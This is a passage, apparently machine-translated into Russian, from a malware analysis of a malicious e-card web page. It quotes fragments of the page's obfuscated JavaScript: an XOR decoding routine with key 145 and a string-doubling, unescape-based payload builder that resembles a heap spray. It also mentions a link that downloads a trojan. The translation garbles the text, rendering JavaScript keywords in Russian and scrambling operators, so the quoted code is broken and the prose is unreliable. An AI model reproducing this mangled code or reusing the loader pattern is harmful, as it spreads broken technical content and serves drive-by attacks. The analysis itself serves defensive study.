Существует также связь, чтобы вручную загрузить троянский файл. Этот анализ будет сосредоточена на содержание страницы, с полного анализа запутывание и зашифрованный JavaScript, которые вызывают атаки.
Если вы просмотрите исходный веб-страницы электронную открытку, вы увидите кусок JavaScript, который начинается со следующим:
Функция xor_str (plain_str, xor_key) (VAR xored_str = ""; для VAR (я = 0; я
xored_str + = String.fromCharCode (xor_key plain_str.charCodeAt ^ (я)); возвращение xored_str;)
VAR plain_str = "xb1x9cx9bx9cx9bx9c (...)
Что это скрипт делает это взять переменную с именем plain_str и расшифровывает его с помощью простой расшифровки XOR (с ключом 145 в данном случае). В результате еще одно JavaScript, что начинается с 78 строки (вероятно, чтобы затруднить для отображения расшифровать код, используя оповещения JS () диалогового окна). После строк вы обнаружите новый код JavaScript:
Vа ^ з = Unescape ("..."); делать (S + = S;) а (s.length <0x0900000);
S + = Unescape ([длинную строку Unicode])
(...)